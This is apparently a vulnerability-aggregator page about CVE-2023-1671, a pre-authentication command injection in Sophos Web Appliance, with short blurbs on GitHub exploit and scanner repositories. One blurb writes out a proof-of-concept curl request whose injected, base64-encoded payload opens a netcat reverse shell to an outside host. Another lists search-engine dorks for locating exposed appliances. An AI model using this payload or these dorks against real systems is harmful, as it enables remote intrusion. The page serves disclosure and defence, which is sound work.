CVE-2023-1671

Published: 04/04/2023 Updated: 26/04/2023
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 0

Vulnerability Summary

A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.

Vulnerable Product

sophos web appliance

Exploits

Sophos Web Appliance version 4.3.10.4 suffers from a pre-authentication command injection vulnerability ...

Github Repositories

Pre-Auth RCE in Sophos Web Appliance

CVE-2023-1671 Pre-Auth RCE in Sophos Web Appliance Poc curl -k --trace-ascii % "19216856108/indexphp?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';nc -e /bin/sh 192168561 4444 #" | base64)" #snip => Send

Sophos Web Appliance pre-auth command injection Vulnerability Scanner

CVE-2023-1671 Vulnerability Scanner. Sophos Web Appliance older than version 4.3.10.4 has a pre-auth command injection vulnerability. This vulnerability exists in the warn-proceed handler and allows the execution of arbitrary code by a remote attacker. Usage: bash CVE-2023-1671.sh targets.txt Note: Targets should not have http or https. Ref

CVE-2023-1671-POC, based on dnslog platform

Dork fofa (title="Sophos Web Appliance" || app="Sophos-Web-Appliance") && title!="Sophos Web Appliance:错误请求" ZoomEye title:"Sophos Web Appliance"-title:"Sophos Web Appliance: Forbidden"-title:"Sophos Web Appliance: Bad Request" Shodan title:"Sophos Web Appliance" Usage python CVE-202

find Proof of concept (PoC) repos for CVEs

CVE Proof of Concept: find proof of concept (PoC) repos for CVEs

Exploit for CVE-2023-1671. It has a test function and an exploitation function. The test sends a ping request to the dnslog domain from the vulnerable site. If the ping arrives, the vulnerability exists; if it doesn't, CVE-2023-1671 is not present. The exploit function, on the other hand, sends a request with your command to the server.

CVE-2023-1671: How does CVE-2023-1671 (cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1671) work? /opt/ws/bin/ftsblistpack is a Perl script that calls /opt/ws/bin/sblistpack, which is another Perl script. The shell command arguments in it are enclosed in single quotes: $rc += system("$sblistpack '$uri' '$user' '$filetype' '